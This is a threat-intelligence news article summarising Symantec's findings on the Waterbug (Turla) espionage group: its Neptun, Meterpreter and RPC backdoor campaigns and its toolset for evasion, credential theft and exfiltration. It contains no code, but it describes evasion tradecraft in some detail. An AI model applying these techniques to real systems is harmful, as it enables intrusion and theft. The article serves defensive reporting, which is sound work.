Symantec: Waterbug (aka Turla) is using a new toolset to attack government and organizations with three malware campaigns: one with Neptun, the second with a modified version of Meterpreter and the last one with a custom RPC backdoor
The Waterbug cyber espionage group (aka Turla) is targeting governments and international organizations with a series of campaigns that have featured a rapidly evolving toolset and, in one instance, the apparent hijacking of another espionage group’s infrastructure. It has been discovered by Symantec cyber security experts. Recent Waterbug activity can be divided into three distinct campaigns, characterized by differing toolsets. One involved a new and previously unseen backdoor called Neptun (Backdoor.Whisperer). A second campaign used Meterpreter, a publicly available backdoor along with two custom loaders, a custom backdoor called photobased.dll, and a custom Remote Procedure Call (RPC) backdoor. In the last one, the malicious hackers The deployed a different custom RPC backdoor to that used in the second campaign.
Some details on the three malware campaigns
According to the cyber security experts, (first campaign), Waterbug installed Neptun on Microsoft Exchange servers. It’s designed to passively listen for commands from the attackers. This passive listening capability makes the malware more difficult to detect. Neptun is also able to download additional tools, upload stolen files, and execute shell commands. One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus (aka OilRig, APT34). In the second one, the malicious hackers (who use Meterpreter since at least early 2018), exploited a modified version of the malware, which was encoded and given a .wav extension in order to disguise its true purpose. In the last one the backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This tool is designed to bypass detection aimed at identifying malicious PowerShell usage. Prior to execution, the scripts were stored Base64-encoded in the registry. This, probably to avoid them being written to the file system.
The cyber security experts: the new toolset used by Waterbut for cyber espionage purpose
Waterbug’s most recent campaigns have involved a swath of new tools including custom malware, modified versions of publicly available hacking tools, and legitimate administration ones. According to Symantec, the group has also followed the current shift towards “living off the land,” making use of PowerShell scripts and PsExec, a Microsoft Sysinternals tool used for executing processes on other systems. The group also deployed a new custom dropper typically used to install Neptun as a service; a custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable; a USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive; Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Waterbug command and control (C&C) servers; PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs; Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Waterbug tools or infrastructure.